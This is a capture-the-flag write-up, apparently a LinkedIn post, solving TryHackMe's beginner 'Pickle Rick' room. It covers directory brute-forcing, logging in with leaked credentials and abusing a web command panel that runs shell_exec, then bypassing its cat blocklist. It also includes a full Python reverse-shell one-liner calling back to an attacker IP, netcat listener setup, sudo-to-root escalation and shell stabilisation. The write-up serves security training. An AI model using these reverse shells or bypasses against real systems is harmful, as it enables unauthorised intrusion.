Pickle Rick - A Rick and Morty CTF Writeup.
"Come on, flip the pickle, Morty. You're not gonna regret it. The payoff is huge."
Aside from being one of the greatest episodes of Rick and Morty, Pickle Rick is also one of the starter Capture the Flags (CTFs) provided by the awesome TryHackMe (https://tryhackme.com), and in this article i'll try to thoroughly break down the steps i took to complete it.
There are already plenty of writeups of this CTF, each of them slightly different and hopefully this provides another knowledge resource to run through the exercise.
The setup and goal is quite simple.
"This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will?help Rick make his potion to transform himself back into a human from a pickle."
Architecturally, there isn't much to describe - there is a server hosting a website which has a message from 'Rick' asking Morty for help finding 3 secret ingredients to turn him from a Pickle, back to Rick by logging onto his computer - except the stumbling block is that he's forgotten his password. Queue, you.
NOTE - I'M USING THE TRYHACKME ATTACKBOX IN THIS WRITEUP. STABILISING REVERSE SHELL LATER ON MAY NOT WORK FROM KALI AS IT USES ZSH. Google it.
When you provision the machine, it provides you with a URL to the webpage which when clicking, takes you to something looking like this
From this starting point you've got a few options. You already know the IP so you could go off an immediately kick off some nmap scans however i opted for some simple passive recon to start with and checked the page source.
Checking down the page you get presented with your first lead.
<!-- Note to self, remember username! Username: R1ckRul3s -->
Noting this down, we move on.
At this point, for sake of ease i set the local variable of the website to something shorthand, in my case i use TGT, which i then echo to make sure it's set.
TGT=https://<IP>
echo $TGT
We can now start to perform some more active recon and get our hands dirty.
Note: In this CTF, you'll find if you use the provided link, it will direct you to the HTTPS version of the website, in the variable be sure to use the HTTP version. I tried using the HTTPS URL, specifying -k in gobuster to ignore insecure SSL as well as increasing the --timeout 20s and it still errored.
Running gobuster against our variable with a few switches we can see some interesting results.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $TGT -x php,html,pdf,txt
This is what we get returned.
/login.php (Status: 200
/index.html (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/denied.php (Status: 302)
/server-status (Status: 403)
/clue.txt (Status: 200)
===============================================================
2022/02/14 19:01:15 Finished
===============================================================
)
A couple of interesting things to see here. Lets check out robots.txt as this may give off intel on what is or isn't allowed to be indexed by search engines etc. This is what we find.
Wubbalubbadubdub
Not exactly clear what this is, but note it down none the less. We also see a login.php page which immediately draws attention. Let's check it out.
No surprises, it takes us to a login page asking for a username and password. Remember those things we took note of?
One was definately a username as stated in the page source, the other, perhaps a password?
Let's try them out.
We're in! And presented with another puzzle to solve.
Clicking around the links doesn't lead anywhere obvious other than some access denied pages however we do have this ominous "Command Panel".
Try smashing some typical things in here like 'ls', 'cat', 'cd' etc. and you'll find that some work, and some don't. Annoying the more interesting ones we want such as "cat", don't work. This is especially irritating given that on an 'ls' we see something we really want - what appears to be a super secret pickle ingredient.
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txtt
No sweat, although cat is apparently on the banned list, we can use a number of other options. I personally used 'strings <filename>' on this step, but there are other methods such as using 'grep . <filename>' or even recursively checking everything using 'grep . -R'.
Fun fact - by checking portal.php you can see the 'banned list' of commands in the array.
portal.php: // Cant use cat
portal.php: $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
portal.php: if(isset($_POST["command"])) {
portal.php: if(contains($_POST["command"], $cmds)) {
portal.php: echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
portal.php: } else {
portal.php: $output = shell_exec($_POST["command"]);
Back to the goal in mind, obviously we find the first ingredient, which i won't put here to be super irritating to anyone looking to this for an easy win, in the filename
领英推荐
Sup3rS3cretPickl3Ingred.txt
and the clue.txt stating;
Look around the file system for the other ingredient.
points us to where the next ones might be found. But how do we get to the filesystem to check for these? How can we get shell on the server itself? We know we have remote execution through the usage of this commands panel, and we know what we can't use so lets hop to some google research and find something that may give us results.
Pentestmonkey is a great resource for basic reverse shells amongst other things (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and we can see if any of these are of any use, but first let's figure out what we can run. Python is a natural starting point given it's wide acceptance and usage in todays world.
python -c "print('pickle')"
This yields no results but using python3 does indeed return something. Looks like we have python3 to work with.
python3 -c "print('pickle')"
Let's go back to pentestmonkey and look for some basic python reverse shells and as we can see there is one that we can try.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
First, we need to set a netcat listener up on our attackbox for connections coming in on 9001. Feel free to use whatever high port here.
nc -lvnp 9001
Then lets modify the python script to our own details. (replacing x.x.x.x with your own instance IP). Remember we are working with python3 so add that in at the start.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hopefully, you'll see the Command Panel hang, and go nowhere but on our attackbox.
root@ip-x-x-x-x:~# nc -lvnp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.10.126.89 53148 received!
/bin/sh: 0: can't access tty; job control turned off
$
We have shell! Granted it's a horrid, unstable, dumb shell which makes you want to throw a hissy fit when you accidently close your netcat session with 'CTRL+C' or can't auto-complete with tab, but we can fix that shortly. Let's do some quick system enumeration and internal recon.
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ groups
www-data
$ sudo -l
Matching Defaults entries for www-data on
??? ip-x-x-x-x.eu-west-1.compute.internal:
??? env_reset, mail_badpass,
??? secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
??????? ip-x-x-x-x.eu-west-1.compute.internal:
??? (ALL) NOPASSWD: ALL
$ ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
$
Hang on. Hang on. (ALL) NOPASSWD: ALL. That's what we like to see (and why this is an easy flagged CTF). This means we can simply do this.
$ sudo su
whoami
root
Well, we've rooted the box at least. But that isn't the goal of this CTF, it's find the ingredients.
Let's sort this shell out as i'm sure by now you've had enough of it.
Again, this is a google job. There are so many resources out there but the basis of many of them is to do the following;
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
At this stage you can carry on or sometimes you may want to export the terminal to xterm using the following.
export TERM=xterm
Now we should have a more stable shell and given ourselves a much easier time getting around.
Checking around and ending up looking at what users have in their home directories is first port of call, which leads us to the third ingredient under /root/ as we naturally end up as root after our privesc, if you want to call it that. Cat it out and enter it in. One more to go.
root@ip-x-x-x-x:/home/rick# cd /root
root@ip-x-x-x-x:~# ls
3rd.txt? snap
Checking the other users, we also find the user 'rick' has the second ingredient. As before, cat it out and there you go!
root@ip-x-x-x-x:/# cd home/rick
root@ip-x-x-x-x:/home/rick# ls
second ingredients
CTF Complete!
This is a very beginner friendly CTF and covers some basics such as active/passive recon, command injection/remote execution and a few other cool elements.
I may make a YouTube video covering this one live, as many i've seen with the exception of our lord and saviour, John Hammond, just blast through the commands without explaining the methodology or reasons behind running them.
Hope you like it and keep CTFing!
Senior MSSP Solutions Architect at CrowdStrike | CISSP Certified
1 年Of course you are a Rick and Morty fan, brilliant minds think alike! ??